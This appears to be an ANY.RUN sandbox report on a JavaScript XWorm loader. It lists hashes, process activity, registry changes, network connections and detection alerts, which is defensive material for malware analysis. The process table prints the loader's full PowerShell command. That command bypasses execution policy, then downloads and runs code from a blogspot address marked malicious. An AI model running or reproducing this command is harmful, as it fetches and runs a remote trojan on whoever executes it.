File name:

_6b6661e8cb0dae1e6603aeb486a35f7a9dbb9822c5a6062bda567e22aa420dfc.txt

Full analysis: https://app.any.run/tasks/a36d291b-60cb-4f00-a364-f1cbc5c37f35
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: April 07, 2026, 08:52:46
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
loader
xworm
rat
susp-powershell
Indicators:
MIME: application/javascript
File info: JavaScript source, ASCII text, with very long lines (1650), with CRLF line terminators
MD5:

9503509C61F97EB02BAE5A957405F7EE

SHA1:

C0AF79F0DCA83AD8D20BA1C13A6DEAB75BB83D78

SHA256:

6B6661E8CB0DAE1E6603AEB486A35F7A9DBB9822C5A6062BDA567E22AA420DFC

SSDEEP:

24:4qhsB1dKL9yqlyqk6QwNlOMIl2u4fg6t682QTRQVDzRtWLfNEVPDV0Yf:WrsMqQqk6rlOJl2Lf2Q1QVptQGVR

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Loader pattern has been found

      • powershell.exe (PID: 8020)

    • Changes powershell execution policy (Bypass)

      • wscript.exe (PID: 6816)

    • XWORM loader has been detected

      • wscript.exe (PID: 6816)

    • XWORM has been detected (SURICATA)

      • powershell.exe (PID: 8020)
      • svchost.exe (PID: 2232)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 8020)

  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 6816)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 8020)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 8020)

    • PowerShell delay command usage (probably sleep evasion)

      • powershell.exe (PID: 8020)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6816)

  • INFO

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 8020)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 8020)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
137
Monitored processes
5
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start #XWORM wscript.exe no specs #XWORM powershell.exe conhost.exe no specs slui.exe #XWORM svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
2232C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
4396C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
6816"C:\Windows\System32\WScript.exe" C:\Users\admin\Desktop\_6b6661e8cb0dae1e6603aeb486a35f7a9dbb9822c5a6062bda567e22aa420dfc.txt.jsC:\Windows\System32\wscript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7704\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
8020"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iex (irM https://missusecapmrch.blogspot.com////////////////ailimius.otd); Start-Sleep -Seconds 47C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
12 222
Read events
12 212
Write events
10
Delete events
0

Modification events

(PID) Process:(6816) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation:writeName:JScriptSetScriptStateStarted
Value:
F4080E0000000000
(PID) Process:(6816) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(6816) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(6816) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(6816) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(4396) slui.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\3d\52C64B7E
Operation:writeName:@%SystemRoot%\System32\sppcomapi.dll,-3200
Value:
Software Licensing
Executable files
0
Suspicious files
1
Text files
4
Unknown types
0

Dropped files

PID
Process
Filename
Type
8020powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xtvoal4i.3ca.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8020powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_u0pqs4x5.3ec.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8020powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_r1ods1ev.3th.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8020powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:C77B42D53E320E2BAC4454B6E51D4ED8
SHA256:ED5CAC36271E5A3AB08B1A3814783AFBF8FF370029D81E0929ACB9B0C1090208
8020powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zzwqgrwv.h0v.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
72
TCP/UDP connections
53
DNS requests
22
Threats
14

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5276
MoUsoCoreWorker.exe
GET
304
40.127.240.158:443
https://settings-win.data.microsoft.com/settings/v3.0/wsd/muse?ProcessorClockSpeed=3094&FlightIds=&UpdateOfferedDays=4294967295&BranchReadinessLevel=CB&OEMManufacturerName=DELL&IsCloudDomainJoined=0&ProcessorIdentifier=AMD64%20Family%2023%20Model%201%20Stepping%202&sku=48&ActivationChannel=Retail&AttrDataVer=186&IsMDMEnrolled=0&ProcessorCores=6&ProcessorModel=AMD%20Ryzen%205%203500%206-Core%20Processor&TotalPhysicalRAM=6144&PrimaryDiskType=4294967295&FlightingBranchName=&ChassisTypeId=1&OEMModelNumber=DELL&SystemVolumeTotalCapacity=260281&sampleId=95271487&deviceClass=Windows.Desktop&App=muse&DisableDualScan=0&AppVer=10.0&OEMSubModel=J5CR&locale=en-US&IsAlwaysOnAlwaysConnectedCapable=0&ms=0&DefaultUserRegion=244&UpdateServiceUrl=http%3A%2F%2Fneverupdatewindows10.com&osVer=10.0.19045.4046.amd64fre.vb_release.191206-1406&os=windows&deviceId=s%3ABAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&DeferQualityUpdatePeriodInDays=0&ring=Retail&DeferFeatureUpdatePeriodInDays=30
US
whitelisted
8020
powershell.exe
GET
302
172.217.16.161:443
https://missusecapmrch.blogspot.com/atom.xml
US
malicious
6260
svchost.exe
GET
200
2.16.164.120:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
NL
binary
825 b
whitelisted
5276
MoUsoCoreWorker.exe
GET
200
23.52.181.212:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
US
binary
814 b
whitelisted
5316
svchost.exe
POST
200
40.126.31.131:443
https://login.live.com/RST2.srf
US
xml
1.24 Kb
whitelisted
8020
powershell.exe
GET
302
172.217.16.161:443
https://missusecapmrch.blogspot.com////////////////ailimius.otd
US
binary
218 b
unknown
5316
svchost.exe
POST
400
40.126.31.131:443
https://login.live.com/ppsecure/deviceaddcredential.srf
US
text
203 b
whitelisted
5316
svchost.exe
POST
200
40.126.31.131:443
https://login.live.com/RST2.srf
US
xml
1.24 Kb
whitelisted
8020
powershell.exe
GET
302
172.217.16.161:443
https://missusecapmrch.blogspot.com////////////////ailimius.otd
US
binary
218 b
unknown
8020
powershell.exe
GET
302
172.217.16.161:443
https://missusecapmrch.blogspot.com/atom.xml
US
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
Not routed
whitelisted
5276
MoUsoCoreWorker.exe
40.127.240.158:443
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
92.123.104.19:443
www.bing.com
AKAMAI-ASN1
NL
whitelisted
7380
slui.exe
48.192.1.64:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
6260
svchost.exe
40.127.240.158:443
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:138
Not routed
whitelisted
6260
svchost.exe
2.16.164.120:80
crl.microsoft.com
AKAMAI-ASN1
NL
whitelisted
6260
svchost.exe
23.52.181.212:80
www.microsoft.com
AKAMAI-AS
US
whitelisted
5276
MoUsoCoreWorker.exe
23.52.181.212:80
www.microsoft.com
AKAMAI-AS
US
whitelisted
3428
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
www.bing.com
  • 92.123.104.19
  • 92.123.104.17
  • 92.123.104.29
  • 92.123.104.21
  • 92.123.104.30
  • 92.123.104.33
  • 92.123.104.32
  • 92.123.104.18
  • 92.123.104.37
whitelisted
activation-v2.sls.microsoft.com
  • 48.192.1.64
whitelisted
google.com
  • 142.250.154.138
  • 142.250.154.100
  • 142.250.154.139
  • 142.250.154.102
  • 142.250.154.113
  • 142.250.154.101
whitelisted
crl.microsoft.com
  • 2.16.164.120
  • 2.16.164.49
  • 23.216.77.42
  • 23.216.77.25
  • 23.216.77.20
whitelisted
www.microsoft.com
  • 23.52.181.212
  • 2.19.101.47
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
login.live.com
  • 40.126.31.131
  • 40.126.31.73
  • 20.190.159.71
  • 40.126.31.130
  • 40.126.31.3
  • 40.126.31.71
  • 40.126.31.129
  • 20.190.159.75
whitelisted
settings-win.data.microsoft.com
  • 4.231.128.59
whitelisted
missusecapmrch.blogspot.com
  • 172.217.16.161
malicious
09c1d5c3-1a6e-4c05-8e4e-eff75c6b5dd6.usrfiles.com
  • 52.222.136.105
  • 52.222.136.128
  • 52.222.136.3
  • 52.222.136.100
unknown

Threats

PID
Process
Class
Message
2232
svchost.exe
Misc activity
ET INFO Commonly Actor Abused Online Service Domain (usrfiles .com)
2232
svchost.exe
A Network Trojan was detected
ET MALWARE Observed DNS Query to XWorm Payload Delivery Domain
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
A Network Trojan was detected
ET MALWARE Observed Malicious Powershell Loader Payload Request (GET)
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
8020
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
8020
powershell.exe
A Network Trojan was detected
ET MALWARE Observed Malicious Powershell Loader Payload Request (GET)
8020
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
8020
powershell.exe
A Network Trojan was detected
ET MALWARE Observed XWorm Payload Delivery Domain in TLS SNI
8020
powershell.exe
Misc activity
ET INFO Observed Commonly Actor Abused Online Service Domain (usrfiles .com in TLS SNI)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
_6b6661e8cb0dae1e6603aeb486a35f7a9dbb9822c5a6062bda567e22aa420dfc.txt